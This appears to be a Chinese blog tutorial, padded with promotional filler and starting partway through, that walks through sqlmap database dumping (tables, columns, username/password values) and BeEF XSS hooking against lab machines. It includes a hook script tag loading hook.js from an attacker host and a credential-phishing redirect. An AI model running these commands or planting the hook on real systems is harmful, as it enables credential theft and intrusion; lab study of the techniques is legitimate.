2024年网络安全：Kali Linux 进行SQL注入与XSS漏洞利用(1)，开源至上

最新推荐文章于 2024-08-05 14:29:11 发布

2401_84558590

最新推荐文章于 2024-08-05 14:29:11 发布

阅读量726

点赞数 8

分类专栏：程序员文章标签：网络安全学习面试

本文链接：https://blog.csdn.net/2401_84558590/article/details/138763423

版权

程序员专栏收录该内容

173 篇文章 0 订阅

订阅专栏

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

（6）获取当前数据库中所有表的名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news --tables

（7）获取当前数据库指定的表的字段名

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users --columns

（8）获取指定库指定表指定字段的值

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump

3.Kali Linux 进行XSS漏洞利用

（1）漏洞测试平台

选择Windows版本

https://github.com/zhuifengshaonianhanlu/pikachu

（2）kali 系统更新

sudo apt-get update

（3）安装ruby

apt-get install ruby

（4）安装beef

apt-get install beef-xss

（5）启动beef-xss

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
   Main PID: 26104 (ruby)
      Tasks: 4 (limit: 2248)
     Memory: 92.8M
        CPU: 3.246s
     CGroup: /system.slice/beef-xss.service
             └─26104 ruby /usr/share/beef-xss/beef

3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]:    -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

（6）浏览器登录

http://127.0.0.1:3000/ui/authentication

(7) 输入账号密码

账号输⼊beef，密码输⼊123456

进入系统

(8) Windows 主机设置钩子

 <script src="http://192.168.204.154:3000/hook.js"></script>

（9）beef获取目标主机

（10）查看模块

（11）选择重定向

执行 (选择Execute)

(12) Windows 主机页面重定向

（13）选择pretty theft

执行 (选择Execute)

（14）Windows主机弹出登录界面

（15）beef获取账号及密码

二、问题

1.XSS分类

（1）类别

1）反射型XSS

2）持久型XSS
 
3）DOM型XSS

2.如何修改beef-xss的密码

（1）修改

vim /etc/beef-xss/config.yaml

(第7、8⾏)

3.beef-xss 服务如何管理

（1）开启服务

1）第一种方式
任意目录，直接输入命令：beef-xss 打开 ，过5秒左右，然后它自动会打开命令行和浏览器beef的登录框

2）第二种方式
进入/usr/share/beef-xss/，输入命令：./beef-xss 打开 ，然后手动打开浏览器链接

（2）服务管理

1）开启beef服务
systemctl start beef-xss.service      

2）关闭beef服务
systemctl stop beef-xss.service        

3）重启beef服务
systemctl restart beef-xss.service

4.运行beef报错

（1）报错

（2）原因分析

需要管理员操作。

（3）解决方法

切换为管理员操作。

5.beef 命令的颜色有哪些区别

写在最后

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

2401_84558590

关注

8
点赞
踩
27

收藏

觉得还不错? 一键收藏
0
评论
2024年网络安全：Kali Linux 进行SQL注入与XSS漏洞利用(1)，开源至上

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
复制链接

扫一扫